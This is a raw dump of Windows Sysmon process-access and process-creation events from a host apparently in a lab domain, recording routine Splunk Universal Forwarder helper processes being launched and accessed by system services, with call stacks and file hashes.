16:13:07.296{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031288Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:07.296{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031287Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:07.296{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031286Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:07.296{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-5693-6008-0E07-00000000A301}7708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031285Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:07.296{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5693-6008-0E07-00000000A301}7708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031284Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:07.296{7901BC46-5693-6008-0E07-00000000A301}7708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031308Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:08.780{7901BC46-5694-6008-1007-00000000A301}55887228C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031307Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:08.639{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5694-6008-1007-00000000A301}5588C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031306Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:08.639{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031305Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:08.639{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031304Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:08.639{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031303Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:08.639{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031302Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:08.639{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-5694-6008-1007-00000000A301}5588C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031301Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:08.639{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5694-6008-1007-00000000A301}5588C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031300Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:08.640{7901BC46-5694-6008-1007-00000000A301}5588C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031317Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:09.561{7901BC46-5695-6008-1107-00000000A301}59085772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031316Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:09.421{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5695-6008-1107-00000000A301}5908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031315Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:09.421{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031314Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:09.421{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031313Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:09.421{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031312Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:09.421{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031311Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:09.421{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-5695-6008-1107-00000000A301}5908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031310Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:09.421{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5695-6008-1107-00000000A301}5908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031309Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:09.421{7901BC46-5695-6008-1107-00000000A301}5908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031334Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:10.842{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5696-6008-1307-00000000A301}4640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031333Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:10.842{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031332Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:10.842{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031331Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:10.842{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031330Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 